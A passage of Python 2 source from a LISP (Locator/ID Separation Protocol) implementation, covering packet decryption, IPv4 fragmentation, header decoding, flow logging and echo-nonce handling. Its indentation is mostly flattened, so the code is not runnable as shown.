        # Call the AES or chacha cipher. For AES-CBC, make sure the
        # ciphertext length is a multiple of 16 bytes before decrypting.
#
ts = lisp_get_timestamp()
if (key.cipher_suite == LISP_CS_25519_CHACHA):
decrypt = chacha.ChaCha(key.encrypt_key, iv).decrypt
elif (key.cipher_suite == LISP_CS_25519_GCM):
k = binascii.unhexlify(key.encrypt_key)
try:
decrypt = AES.new(k, AES.MODE_GCM, iv).decrypt
except:
self.packet_error = "no-decrypt-key"
lprint("You need AES-GCM, do a 'pip install pycryptodome'")
return([None, False])
#endtry
else:
if ((len(packet) % 16) != 0):
dprint("Ciphertext not multiple of 16 bytes, packet dropped")
return([None, False])
#endif
k = binascii.unhexlify(key.encrypt_key)
decrypt = AES.new(k, AES.MODE_CBC, iv).decrypt
#endif
plaintext = decrypt(packet)
ts = int(str(time.time() - ts).split(".")[1][0:6])
#
        # Decryption is done. Log the details and return the plaintext payload.
#
string = bold("Decrypt", False)
addr_str = "RLOC: " + red(addr_str, False)
auth = "poly" if key.do_poly else "sha256"
auth = bold(auth, False)
icv_str = "ICV({}): {}".format(auth, p_icv)
dprint("{} for key-id: {}, {}, {} (good), {}-time: {} usec". \
format(string, key.key_id, addr_str, icv_str, cipher_str, ts))
#
        # Keep only the outer header, UDP header, and LISP header in
        # self.packet.
# We will append the plaintext in the caller once we parse the inner
# packet length so we can truncate any padding the encryptor put on.
#
self.packet = self.packet[0:header_length]
return([plaintext, True])
#enddef
def fragment_outer(self, outer_hdr, inner_packet):
frag_len = 1000
#
# Break up packet payload in fragments and put in array to have
# IP header added in next loop below.
#
frags = []
offset = 0
length = len(inner_packet)
while (offset < length):
frag = inner_packet[offset::]
if (len(frag) > frag_len): frag = frag[0:frag_len]
frags.append(frag)
offset += len(frag)
#endwhile
#
        # Now fix each outer IPv4 header with fragment-offset and
        # total-length values and recompute the IPv4 header checksum.
#
fragments = []
offset = 0
for frag in frags:
#
# Set frag-offset field in outer IPv4 header.
#
fo = offset if (frag == frags[-1]) else 0x2000 + offset
fo = socket.htons(fo)
outer_hdr = outer_hdr[0:6] + struct.pack("H", fo) + outer_hdr[8::]
#
# Set total-length field in outer IPv4 header and checksum.
#
l = socket.htons(len(frag) + 20)
outer_hdr = outer_hdr[0:2] + struct.pack("H", l) + outer_hdr[4::]
outer_hdr = lisp_ip_checksum(outer_hdr)
fragments.append(outer_hdr + frag)
offset += len(frag) / 8
#endfor
return(fragments)
#enddef
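    #
    # Illustrative arithmetic for fragment_outer() above (sizes assumed): a
    # 2800-byte inner packet becomes fragments of 1000, 1000, and 800 bytes.
    # Since the frag-offset field counts 8-byte units, the fragments carry
    # offsets 0, 125, and 250, with the more-fragments bit (0x2000) set on
    # all but the last one.
    #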
def fragment(self):
packet = self.fix_outer_header(self.packet)
#
# If inner header is IPv4, we will fragment the inner header and encap
# each fragment. If the inner header is IPv6, we will not add the
# Fragmentation Header into the inner IPv6 packet.
#
length = len(packet)
if (length <= 1500): return([packet], "Fragment-None")
packet = self.packet
#
# Fragment outer IPv4 header if inner packet is IPv6 (or Mac frame).
# We cannot fragment IPv6 packet since we are not the source.
#
if (self.inner_version != 4):
ident = random.randint(0, 0xffff)
outer_hdr = packet[0:4] + struct.pack("H", ident) + packet[6:20]
inner_packet = packet[20::]
fragments = self.fragment_outer(outer_hdr, inner_packet)
return(fragments, "Fragment-Outer")
#endif
#
# Fragment inner IPv4 packet.
#
outer_hdr_len = 56 if (self.outer_version == 6) else 36
outer_hdr = packet[0:outer_hdr_len]
inner_hdr = packet[outer_hdr_len: outer_hdr_len + 20]
inner_packet = packet[outer_hdr_len + 20::]
#
# If DF-bit is set, don't fragment packet.
#
frag_field = struct.unpack("H", inner_hdr[6:8])[0]
frag_field = socket.ntohs(frag_field)
if (frag_field & 0x4000):
df_bit = bold("DF-bit set", False)
dprint("{} in inner header, packet discarded".format(df_bit))
return([], "Fragment-None-DF-bit")
#endif
offset = 0
length = len(inner_packet)
fragments = []
while (offset < length):
fragments.append(inner_packet[offset:offset+1400])
offset += 1400
#endwhile
#
# Now put inner header and outer header on each fragment.
#
frags = fragments
fragments = []
mf = True if frag_field & 0x2000 else False
frag_field = (frag_field & 0x1fff) * 8
for frag in frags:
#
# Set fragment-offset and MF bit if not last fragment.
#
ff = frag_field / 8
if (mf):
ff |= 0x2000
elif (frag != frags[-1]):
ff |= 0x2000
#endif
ff = socket.htons(ff)
inner_hdr = inner_hdr[0:6] + struct.pack("H", ff) + inner_hdr[8::]
#
# Set length of fragment, set up offset for next fragment-offset,
# and header checksum fragment packet. Then prepend inner header
# to payload.
#
length = len(frag)
frag_field += length
l = socket.htons(length + 20)
inner_hdr = inner_hdr[0:2] + struct.pack("H", l) + \
inner_hdr[4:10] + struct.pack("H", 0) + inner_hdr[12::]
inner_hdr = lisp_ip_checksum(inner_hdr)
fragment = inner_hdr + frag
#
# Change outer header length and header checksum if IPv4 outer
            # header. If IPv6 outer header, the raw socket prepends the header.
#
length = len(fragment)
if (self.outer_version == 4):
l = length + outer_hdr_len
length += 16
outer_hdr = outer_hdr[0:2] + struct.pack("H", l) + \
outer_hdr[4::]
outer_hdr = lisp_ip_checksum(outer_hdr)
fragment = outer_hdr + fragment
fragment = self.fix_outer_header(fragment)
#endif
#
# Finally fix outer UDP header length. Byte-swap it.
#
udp_len_index = outer_hdr_len - 12
l = socket.htons(length)
fragment = fragment[0:udp_len_index] + struct.pack("H", l) + \
fragment[udp_len_index+2::]
fragments.append(fragment)
#endfor
return(fragments, "Fragment-Inner")
#enddef
def fix_outer_header(self, packet):
#
# IP_HDRINCL requires the total-length and frag-offset fields to be
        # in host byte order, so they have to be byte-swapped here. But when
        # testing, we (UPC guys) discovered the frag field didn't need swapping. The
# conclusion is that byte-swapping is necessary for MacOS but not for
# Linux OSes.
#
if (self.outer_version == 4 or self.inner_version == 4):
if (lisp_is_macos()):
packet = packet[0:2] + packet[3] + packet[2] + packet[4:6] + \
packet[7] + packet[6] + packet[8::]
else:
packet = packet[0:2] + packet[3] + packet[2] + packet[4::]
#endif
#endif
return(packet)
#enddef
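    #
    # Illustrative example for fix_outer_header() above (values assumed): a
    # total-length of 84 is stored in the packet in network byte order as
    # bytes 0x00 0x54; swapping them to 0x54 0x00 lets a little-endian kernel
    # using IP_HDRINCL read 84 in host byte order. On MacOS the frag-offset
    # bytes get the same treatment; on Linux they are left alone.
    #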
def send_packet(self, lisp_raw_socket, dest):
if (lisp_flow_logging and dest != self.inner_dest): self.log_flow(True)
dest = dest.print_address_no_iid()
fragments, in_or_out = self.fragment()
for fragment in fragments:
if (len(fragments) != 1):
self.packet = fragment
self.print_packet(in_or_out, True)
#endif
try: lisp_raw_socket.sendto(fragment, (dest, 0))
except socket.error, e:
lprint("socket.sendto() failed: {}".format(e))
#endtry
#endfor
#enddef
def send_l2_packet(self, l2_socket, mac_header):
if (l2_socket == None):
lprint("No layer-2 socket, drop IPv6 packet")
return
#endif
if (mac_header == None):
lprint("Could not build MAC header, drop IPv6 packet")
return
#endif
packet = mac_header + self.packet
# try: l2_socket.send(packet)
# except socket.error, e:
# lprint("send_l2_packet(): socket.send() failed: {}".format(e))
# #endtry
# return
#
# Use tuntap tunnel interface instead of raw sockets for IPv6
# decapsulated packets.
#
l2_socket.write(packet)
return
#enddef
def bridge_l2_packet(self, eid, db):
try: dyn_eid = db.dynamic_eids[eid.print_address_no_iid()]
except: return
try: interface = lisp_myinterfaces[dyn_eid.interface]
except: return
try:
socket = interface.get_bridge_socket()
if (socket == None): return
except: return
try: socket.send(self.packet)
except socket.error, e:
lprint("bridge_l2_packet(): socket.send() failed: {}".format(e))
#endtry
#enddef
def decode(self, is_lisp_packet, lisp_ipc_socket, stats):
self.packet_error = ""
packet = self.packet
orig_len = len(packet)
L3 = L2 = True
#
# Get version number of outer header so we can decode outer addresses.
#
header_len = 0
iid = self.lisp_header.get_instance_id()
if (is_lisp_packet):
version = struct.unpack("B", packet[0:1])[0]
self.outer_version = version >> 4
if (self.outer_version == 4):
#
# MacOS is zeroing the IP header checksum for a raw socket.
# If we receive this, bypass the checksum calculation.
#
orig_checksum = struct.unpack("H", packet[10:12])[0]
packet = lisp_ip_checksum(packet)
checksum = struct.unpack("H", packet[10:12])[0]
if (checksum != 0):
if (orig_checksum != 0 or lisp_is_macos() == False):
self.packet_error = "checksum-error"
if (stats):
stats[self.packet_error].increment(orig_len)
#endif
lprint("IPv4 header checksum failed for outer header")
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
#endif
afi = LISP_AFI_IPV4
offset = 12
self.outer_tos = struct.unpack("B", packet[1:2])[0]
self.outer_ttl = struct.unpack("B", packet[8:9])[0]
header_len = 20
elif (self.outer_version == 6):
afi = LISP_AFI_IPV6
offset = 8
tos = struct.unpack("H", packet[0:2])[0]
self.outer_tos = (socket.ntohs(tos) >> 4) & 0xff
self.outer_ttl = struct.unpack("B", packet[7:8])[0]
header_len = 40
else:
self.packet_error = "outer-header-error"
if (stats): stats[self.packet_error].increment(orig_len)
lprint("Cannot decode outer header")
return(None)
#endif
self.outer_source.afi = afi
self.outer_dest.afi = afi
addr_length = self.outer_source.addr_length()
self.outer_source.unpack_address(packet[offset:offset+addr_length])
offset += addr_length
self.outer_dest.unpack_address(packet[offset:offset+addr_length])
packet = packet[header_len::]
self.outer_source.mask_len = self.outer_source.host_mask_len()
self.outer_dest.mask_len = self.outer_dest.host_mask_len()
#
# Get UDP fields
#
short = struct.unpack("H", packet[0:2])[0]
self.udp_sport = socket.ntohs(short)
short = struct.unpack("H", packet[2:4])[0]
self.udp_dport = socket.ntohs(short)
short = struct.unpack("H", packet[4:6])[0]
self.udp_length = socket.ntohs(short)
short = struct.unpack("H", packet[6:8])[0]
self.udp_checksum = socket.ntohs(short)
packet = packet[8::]
#
# Determine what is inside, a packet or a frame.
#
L3 = (self.udp_dport == LISP_DATA_PORT or
self.udp_sport == LISP_DATA_PORT)
L2 = (self.udp_dport in (LISP_L2_DATA_PORT, LISP_VXLAN_DATA_PORT))
#
# Get LISP header fields.
#
if (self.lisp_header.decode(packet) == False):
self.packet_error = "lisp-header-error"
if (stats): stats[self.packet_error].increment(orig_len)
if (lisp_flow_logging): self.log_flow(False)
lprint("Cannot decode LISP header")
return(None)
#endif
packet = packet[8::]
iid = self.lisp_header.get_instance_id()
header_len += 16
#endif
if (iid == 0xffffff): iid = 0
#
# Time to decrypt if K-bits set.
#
decrypted = False
key_id = self.lisp_header.k_bits
if (key_id):
addr_str = lisp_get_crypto_decap_lookup_key(self.outer_source,
self.udp_sport)
if (addr_str == None):
self.packet_error = "no-decrypt-key"
if (stats): stats[self.packet_error].increment(orig_len)
self.print_packet("Receive", is_lisp_packet)
ks = bold("No key available", False)
dprint("{} for key-id {} to decrypt packet".format(ks, key_id))
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
key = lisp_crypto_keys_by_rloc_decap[addr_str][key_id]
if (key == None):
self.packet_error = "no-decrypt-key"
if (stats): stats[self.packet_error].increment(orig_len)
self.print_packet("Receive", is_lisp_packet)
ks = bold("No key available", False)
dprint("{} to decrypt packet from RLOC {}".format(ks,
red(addr_str, False)))
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
#
# Decrypt and continue processing inner header.
#
key.use_count += 1
packet, decrypted = self.decrypt(packet, header_len, key,
addr_str)
if (decrypted == False):
if (stats): stats[self.packet_error].increment(orig_len)
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
#endif
#
# Get inner header fields.
#
version = struct.unpack("B", packet[0:1])[0]
self.inner_version = version >> 4
if (L3 and self.inner_version == 4 and version >= 0x45):
packet_len = socket.ntohs(struct.unpack("H", packet[2:4])[0])
self.inner_tos = struct.unpack("B", packet[1:2])[0]
self.inner_ttl = struct.unpack("B", packet[8:9])[0]
self.inner_protocol = struct.unpack("B", packet[9:10])[0]
self.inner_source.afi = LISP_AFI_IPV4
self.inner_dest.afi = LISP_AFI_IPV4
self.inner_source.unpack_address(packet[12:16])
self.inner_dest.unpack_address(packet[16:20])
frag_field = socket.ntohs(struct.unpack("H", packet[6:8])[0])
self.inner_is_fragment = (frag_field & 0x2000 or frag_field != 0)
if (self.inner_protocol == LISP_UDP_PROTOCOL):
self.inner_sport = struct.unpack("H", packet[20:22])[0]
self.inner_sport = socket.ntohs(self.inner_sport)
self.inner_dport = struct.unpack("H", packet[22:24])[0]
self.inner_dport = socket.ntohs(self.inner_dport)
#endif
elif (L3 and self.inner_version == 6 and version >= 0x60):
packet_len = socket.ntohs(struct.unpack("H", packet[4:6])[0]) + 40
tos = struct.unpack("H", packet[0:2])[0]
self.inner_tos = (socket.ntohs(tos) >> 4) & 0xff
self.inner_ttl = struct.unpack("B", packet[7:8])[0]
self.inner_protocol = struct.unpack("B", packet[6:7])[0]
self.inner_source.afi = LISP_AFI_IPV6
self.inner_dest.afi = LISP_AFI_IPV6
self.inner_source.unpack_address(packet[8:24])
self.inner_dest.unpack_address(packet[24:40])
if (self.inner_protocol == LISP_UDP_PROTOCOL):
self.inner_sport = struct.unpack("H", packet[40:42])[0]
self.inner_sport = socket.ntohs(self.inner_sport)
self.inner_dport = struct.unpack("H", packet[42:44])[0]
self.inner_dport = socket.ntohs(self.inner_dport)
#endif
elif (L2):
packet_len = len(packet)
self.inner_tos = 0
self.inner_ttl = 0
self.inner_protocol = 0
self.inner_source.afi = LISP_AFI_MAC
self.inner_dest.afi = LISP_AFI_MAC
self.inner_dest.unpack_address(self.swap_mac(packet[0:6]))
self.inner_source.unpack_address(self.swap_mac(packet[6:12]))
elif (self.lisp_header.get_instance_id() == 0xffffff):
if (lisp_flow_logging): self.log_flow(False)
return(self)
else:
self.packet_error = "bad-inner-version"
if (stats): stats[self.packet_error].increment(orig_len)
lprint("Cannot decode encapsulation, header version {}".format(\
hex(version)))
packet = lisp_format_packet(packet[0:20])
lprint("Packet header: {}".format(packet))
if (lisp_flow_logging and is_lisp_packet): self.log_flow(False)
return(None)
#endif
self.inner_source.mask_len = self.inner_source.host_mask_len()
self.inner_dest.mask_len = self.inner_dest.host_mask_len()
self.inner_source.instance_id = iid
self.inner_dest.instance_id = iid
#
# If we are configured to do Nonce-Echoing, do lookup on source-EID
# to obtain source RLOC to store nonce to echo.
#
if (lisp_nonce_echoing and is_lisp_packet):
echo_nonce = lisp_get_echo_nonce(self.outer_source, None)
if (echo_nonce == None):
rloc_str = self.outer_source.print_address_no_iid()
echo_nonce = lisp_echo_nonce(rloc_str)
#endif
nonce = self.lisp_header.get_nonce()
if (self.lisp_header.is_e_bit_set()):
echo_nonce.receive_request(lisp_ipc_socket, nonce)
elif (echo_nonce.request_nonce_sent):
echo_nonce.receive_echo(lisp_ipc_socket, nonce)
#endif
#endif
#
# If we decrypted, we may have to truncate packet if the encrypter
# padded the packet.
#
if (decrypted): self.packet += packet[:packet_len]
#
# Log a packet that was parsed correctly.
#
if (lisp_flow_logging and is_lisp_packet): self.log_flow(False)
return(self)
#enddef
def swap_mac(self, mac):
return(mac[1] + mac[0] + mac[3] + mac[2] + mac[5] + mac[4])
#enddef
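    #
    # Illustrative example for swap_mac() above (value assumed): the 6-byte
    # string "\x00\x50\x56\xab\xcd\xef" is returned as
    # "\x50\x00\xab\x56\xef\xcd", i.e. the bytes of each 16-bit word are
    # swapped.
    #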
def strip_outer_headers(self):
offset = 16
offset += 20 if (self.outer_version == 4) else 40
self.packet = self.packet[offset::]
return(self)
#enddef
def hash_ports(self):
packet = self.packet
version = self.inner_version
hashval = 0
if (version == 4):
protocol = struct.unpack("B", packet[9])[0]
if (self.inner_is_fragment): return(protocol)
if (protocol in [6, 17]):
hashval = protocol
hashval += struct.unpack("I", packet[20:24])[0]
hashval = (hashval >> 16) ^ (hashval & 0xffff)
#endif
#endif
if (version == 6):
protocol = struct.unpack("B", packet[6])[0]
if (protocol in [6, 17]):
hashval = protocol
hashval += struct.unpack("I", packet[40:44])[0]
hashval = (hashval >> 16) ^ (hashval & 0xffff)
#endif
#endif
return(hashval)
#enddef
def hash_packet(self):
hashval = self.inner_source.address ^ self.inner_dest.address
hashval += self.hash_ports()
if (self.inner_version == 4):
hashval = (hashval >> 16) ^ (hashval & 0xffff)
elif (self.inner_version == 6):
hashval = (hashval >> 64) ^ (hashval & 0xffffffffffffffff)
hashval = (hashval >> 32) ^ (hashval & 0xffffffff)
hashval = (hashval >> 16) ^ (hashval & 0xffff)
#endif
self.udp_sport = 0xf000 | (hashval & 0xfff)
#enddef
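    #
    # Illustrative example for hash_packet() above (hash value assumed): if
    # the folded hash of the inner addresses and ports is 0x1a2b, the source
    # port becomes 0xf000 | 0xa2b = 0xfa2b, so encapsulated flows always use
    # a source port in the range 0xf000-0xffff.
    #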
def print_packet(self, s_or_r, is_lisp_packet):
if (is_lisp_packet == False):
iaddr_str = "{} -> {}".format(self.inner_source.print_address(),
self.inner_dest.print_address())
dprint(("{} {}, tos/ttl: {}/{}, length: {}, packet: {} ..."). \
format(bold(s_or_r, False),
green(iaddr_str, False), self.inner_tos,
self.inner_ttl, len(self.packet),
lisp_format_packet(self.packet[0:60])))
return
#endif
if (s_or_r.find("Receive") != -1):
ed = "decap"
ed += "-vxlan" if self.udp_dport == LISP_VXLAN_DATA_PORT else ""
else:
ed = s_or_r
if (ed in ["Send", "Replicate"] or ed.find("Fragment") != -1):
ed = "encap"
#endif
#endif
oaddr_str = "{} -> {}".format(self.outer_source.print_address_no_iid(),
self.outer_dest.print_address_no_iid())
#
# Special case where Info-Request is inside of a 4341 packet for
# NAT-traversal.
#
if (self.lisp_header.get_instance_id() == 0xffffff):
line = ("{} LISP packet, outer RLOCs: {}, outer tos/ttl: " + \
"{}/{}, outer UDP: {} -> {}, ")
line += bold("control-packet", False) + ": {} ..."
dprint(line.format(bold(s_or_r, False), red(oaddr_str, False),
self.outer_tos, self.outer_ttl, self.udp_sport,
self.udp_dport, lisp_format_packet(self.packet[0:56])))
return
else:
line = ("{} LISP packet, outer RLOCs: {}, outer tos/ttl: " + \
"{}/{}, outer UDP: {} -> {}, inner EIDs: {}, " + \
"inner tos/ttl: {}/{}, length: {}, {}, packet: {} ...")
#endif
if (self.lisp_header.k_bits):
if (ed == "encap"): ed = "encrypt/encap"
if (ed == "decap"): ed = "decap/decrypt"
#endif
iaddr_str = "{} -> {}".format(self.inner_source.print_address(),
self.inner_dest.print_address())
dprint(line.format(bold(s_or_r, False), red(oaddr_str, False),
self.outer_tos, self.outer_ttl, self.udp_sport, self.udp_dport,
green(iaddr_str, False), self.inner_tos, self.inner_ttl,
len(self.packet), self.lisp_header.print_header(ed),
lisp_format_packet(self.packet[0:56])))
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.inner_source, self.inner_dest))
#enddef
def get_raw_socket(self):
iid = str(self.lisp_header.get_instance_id())
if (iid == "0"): return(None)
if (lisp_iid_to_interface.has_key(iid) == False): return(None)
interface = lisp_iid_to_interface[iid]
s = interface.get_socket()
if (s == None):
string = bold("SO_BINDTODEVICE", False)
enforce = (os.getenv("LISP_ENFORCE_BINDTODEVICE") != None)
lprint("{} required for multi-tenancy support, {} packet".format( \
string, "drop" if enforce else "forward"))
if (enforce): return(None)
#endif
iid = bold(iid, False)
d = bold(interface.device, False)
dprint("Send packet on instance-id {} interface {}".format(iid, d))
return(s)
#enddef
def log_flow(self, encap):
global lisp_flow_log
dump = os.path.exists("./log-flows")
if (len(lisp_flow_log) == LISP_FLOW_LOG_SIZE or dump):
args = [lisp_flow_log]
lisp_flow_log = []
threading.Thread(target=lisp_write_flow_log, args=args).start()
if (dump): os.system("rm ./log-flows")
return
#endif
ts = datetime.datetime.now()
lisp_flow_log.append([ts, encap, self.packet, self])
    #enddef
def print_flow(self, ts, encap, packet):
ts = ts.strftime("%m/%d/%y %H:%M:%S.%f")[:-3]
flow = "{}: {}".format(ts, "encap" if encap else "decap")
osrc = red(self.outer_source.print_address_no_iid(), False)
odst = red(self.outer_dest.print_address_no_iid(), False)
isrc = green(self.inner_source.print_address(), False)
idst = green(self.inner_dest.print_address(), False)
if (self.lisp_header.get_instance_id() == 0xffffff):
flow += " {}:{} -> {}:{}, LISP control message type {}\n"
flow = flow.format(osrc, self.udp_sport, odst, self.udp_dport,
self.inner_version)
return(flow)
#endif
if (self.outer_dest.is_null() == False):
flow += " {}:{} -> {}:{}, len/tos/ttl {}/{}/{}"
flow = flow.format(osrc, self.udp_sport, odst, self.udp_dport,
len(packet), self.outer_tos, self.outer_ttl)
#endif
#
# Can't look at inner header if encrypted. Protecting user privacy.
#
if (self.lisp_header.k_bits != 0):
error = "\n"
if (self.packet_error != ""):
error = " ({})".format(self.packet_error) + error
#endif
flow += ", encrypted" + error
return(flow)
#endif
#
# Position to inner header.
#
if (self.outer_dest.is_null() == False):
packet = packet[36::] if self.outer_version == 4 else packet[56::]
#endif
protocol = packet[9] if self.inner_version == 4 else packet[6]
protocol = struct.unpack("B", protocol)[0]
flow += " {} -> {}, len/tos/ttl/prot {}/{}/{}/{}"
flow = flow.format(isrc, idst, len(packet), self.inner_tos,
self.inner_ttl, protocol)
#
# Show some popular transport layer data.
#
if (protocol in [6, 17]):
ports = packet[20:24] if self.inner_version == 4 else packet[40:44]
if (len(ports) == 4):
ports = socket.ntohl(struct.unpack("I", ports)[0])
flow += ", ports {} -> {}".format(ports >> 16, ports & 0xffff)
#endif
elif (protocol == 1):
seq = packet[26:28] if self.inner_version == 4 else packet[46:48]
if (len(seq) == 2):
seq = socket.ntohs(struct.unpack("H", seq)[0])
flow += ", icmp-seq {}".format(seq)
#endif
        #endif
if (self.packet_error != ""):
flow += " ({})".format(self.packet_error)
#endif
flow += "\n"
return(flow)
    #enddef
def is_trace(self):
ports = [self.inner_sport, self.inner_dport]
return(self.inner_protocol == LISP_UDP_PROTOCOL and
LISP_TRACE_PORT in ports)
#enddef
#endclass
#
# LISP encapsulation header definition.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | Source Port = xxxx | Dest Port = 4341 |
# UDP +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | UDP Length | UDP Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# L |N|L|E|V|I|P|K|K| Nonce/Map-Version |
# I \ +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# S / | Instance ID/Locator-Status-Bits |
# P +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
LISP_N_BIT = 0x80000000
LISP_L_BIT = 0x40000000
LISP_E_BIT = 0x20000000
LISP_V_BIT = 0x10000000
LISP_I_BIT = 0x08000000
LISP_P_BIT = 0x04000000
LISP_K_BITS = 0x03000000
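#
# As an illustrative (assumed) example, a first-long of 0x89001234 has the
# N-bit and I-bit set (0x80000000 | 0x08000000), key-id 1 in the KK bits
# (0x01000000), and a 24-bit nonce of 0x001234.
#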
class lisp_data_header():
def __init__(self):
self.first_long = 0
self.second_long = 0
self.k_bits = 0
#enddef
def print_header(self, e_or_d):
first_long = lisp_hex_string(self.first_long & 0xffffff)
second_long = lisp_hex_string(self.second_long).zfill(8)
line = ("{} LISP-header -> flags: {}{}{}{}{}{}{}{}, nonce: {}, " + \
"iid/lsb: {}")
return(line.format(bold(e_or_d, False),
"N" if (self.first_long & LISP_N_BIT) else "n",
"L" if (self.first_long & LISP_L_BIT) else "l",
"E" if (self.first_long & LISP_E_BIT) else "e",
"V" if (self.first_long & LISP_V_BIT) else "v",
"I" if (self.first_long & LISP_I_BIT) else "i",
"P" if (self.first_long & LISP_P_BIT) else "p",
"K" if (self.k_bits in [2,3]) else "k",
"K" if (self.k_bits in [1,3]) else "k",
first_long, second_long))
#enddef
def encode(self):
packet_format = "II"
first_long = socket.htonl(self.first_long)
second_long = socket.htonl(self.second_long)
header = struct.pack(packet_format, first_long, second_long)
return(header)
#enddef
def decode(self, packet):
packet_format = "II"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
first_long, second_long = \
struct.unpack(packet_format, packet[:format_size])
self.first_long = socket.ntohl(first_long)
self.second_long = socket.ntohl(second_long)
self.k_bits = (self.first_long & LISP_K_BITS) >> 24
return(True)
#enddef
def key_id(self, key_id):
self.first_long &= ~(0x3 << 24)
self.first_long |= ((key_id & 0x3) << 24)
self.k_bits = key_id
#enddef
def nonce(self, nonce):
self.first_long |= LISP_N_BIT
self.first_long |= nonce
#enddef
def map_version(self, version):
self.first_long |= LISP_V_BIT
self.first_long |= version
#enddef
def instance_id(self, iid):
if (iid == 0): return
self.first_long |= LISP_I_BIT
self.second_long &= 0xff
self.second_long |= (iid << 8)
#enddef
def get_instance_id(self):
return((self.second_long >> 8) & 0xffffff)
#enddef
def locator_status_bits(self, lsbs):
self.first_long |= LISP_L_BIT
self.second_long &= 0xffffff00
self.second_long |= (lsbs & 0xff)
#enddef
def is_request_nonce(self, nonce):
return(nonce & 0x80000000)
#enddef
def request_nonce(self, nonce):
self.first_long |= LISP_E_BIT
self.first_long |= LISP_N_BIT
self.first_long |= (nonce & 0xffffff)
#enddef
def is_e_bit_set(self):
return(self.first_long & LISP_E_BIT)
#enddef
def get_nonce(self):
return(self.first_long & 0xffffff)
#enddef
#endclass
class lisp_echo_nonce():
def __init__(self, rloc_str):
self.rloc_str = rloc_str
self.rloc = lisp_address(LISP_AFI_NONE, rloc_str, 0, 0)
self.request_nonce_sent = None
self.echo_nonce_sent = None
self.last_request_nonce_sent = None
self.last_new_request_nonce_sent = None
self.last_echo_nonce_sent = None
self.last_new_echo_nonce_sent = None
self.request_nonce_rcvd = None
self.echo_nonce_rcvd = None
self.last_request_nonce_rcvd = None
self.last_echo_nonce_rcvd = None
self.last_good_echo_nonce_rcvd = None
lisp_nonce_echo_list[rloc_str] = self
#enddef
def send_ipc(self, ipc_socket, ipc):
source = "lisp-itr" if lisp_i_am_itr else "lisp-etr"
dest = "lisp-etr" if lisp_i_am_itr else "lisp-itr"
ipc = lisp_command_ipc(ipc, source)
lisp_ipc(ipc, ipc_socket, dest)
#enddef
def send_request_ipc(self, ipc_socket, nonce):
nonce = lisp_hex_string(nonce)
ipc = "nonce%R%{}%{}".format(self.rloc_str, nonce)
self.send_ipc(ipc_socket, ipc)
#enddef
def send_echo_ipc(self, ipc_socket, nonce):
nonce = lisp_hex_string(nonce)
ipc = "nonce%E%{}%{}".format(self.rloc_str, nonce)
self.send_ipc(ipc_socket, ipc)
#enddef
def receive_request(self, ipc_socket, nonce):
old_nonce = self.request_nonce_rcvd
self.request_nonce_rcvd = nonce
self.last_request_nonce_rcvd = lisp_get_timestamp()
if (lisp_i_am_rtr): return
if (old_nonce != nonce): self.send_request_ipc(ipc_socket, nonce)
#enddef
def receive_echo(self, ipc_socket, nonce):
if (self.request_nonce_sent != nonce): return
self.last_echo_nonce_rcvd = lisp_get_timestamp()
if (self.echo_nonce_rcvd == nonce): return
self.echo_nonce_rcvd = nonce
if (lisp_i_am_rtr): return
self.send_echo_ipc(ipc_socket, nonce)
#enddef
def get_request_or_echo_nonce(self, ipc_socket, remote_rloc):
#
# If we are in both request-nonce and echo-nonce mode, let the
# higher IP addressed RLOC be in request mode.
#
if (self.request_nonce_sent and self.echo_nonce_sent and remote_rloc):
local_rloc = lisp_myrlocs[0] if remote_rloc.is_ipv4() \
else lisp_myrlocs[1]
if (remote_rloc.address > local_rloc.address):
a = "exit"
self.request_nonce_sent = None
else:
a = "stay in"
self.echo_nonce_sent = None
#endif
c = bold("collision", False)
l = red(local_rloc.print_address_no_iid(), False)
r = red(remote_rloc.print_address_no_iid(), False)
lprint("Echo nonce {}, {} -> {}, {} request-nonce mode".format(c,
l, r, a))
#endif
#
# If we are echoing, return echo-nonce. Or get out of echo-nonce mode.
#
if (self.echo_nonce_sent != None):
nonce = self.echo_nonce_sent
e = bold("Echoing", False)
lprint("{} nonce 0x{} to {}".format(e,
lisp_hex_string(nonce), red(self.rloc_str, False)))
self.last_echo_nonce_sent = lisp_get_timestamp()
self.echo_nonce_sent = None
return(nonce)
        #endif
#
# Should we stop requesting nonce-echoing? Only do so if we received
        # an echo response and some time (10 seconds) has passed.
#
nonce = self.request_nonce_sent
last = self.last_request_nonce_sent
if (nonce and last != None):
if (time.time() - last >= LISP_NONCE_ECHO_INTERVAL):
self.request_nonce_sent = None
lprint("Stop request-nonce mode for {}, nonce 0x{}".format( \
red(self.rloc_str, False), lisp_hex_string(nonce)))
return(None)
#endif
#endif
#
        # Start request-nonce mode and get a new nonce. If a request-nonce is
        # already stored, use the same nonce as last time regardless of
        # whether we received an echo response. Setting the high-order bit
        # tells the caller to set the e-bit in the header.
#
if (nonce == None):
nonce = lisp_get_data_nonce()
if (self.recently_requested()): return(nonce)
self.request_nonce_sent = nonce
lprint("Start request-nonce mode for {}, nonce 0x{}".format( \
red(self.rloc_str, False), lisp_hex_string(nonce)))
self.last_new_request_nonce_sent = lisp_get_timestamp()
#
# Send the request-nonce to the ETR so it can tell us when the
# other side has echoed this request-nonce.
#
if (lisp_i_am_itr == False): return(nonce | 0x80000000)
self.send_request_ipc(ipc_socket, nonce)
else:
lprint("Continue request-nonce mode for {}, nonce 0x{}".format( \
red(self.rloc_str, False), lisp_hex_string(nonce)))
#endif
#
# Continue sending request-nonce. But if we never received an echo,
# don't update timer.
#
self.last_request_nonce_sent = lisp_get_timestamp()
return(nonce | 0x80000000)
#enddef
def request_nonce_timeout(self):
if (self.request_nonce_sent == None): return(False)
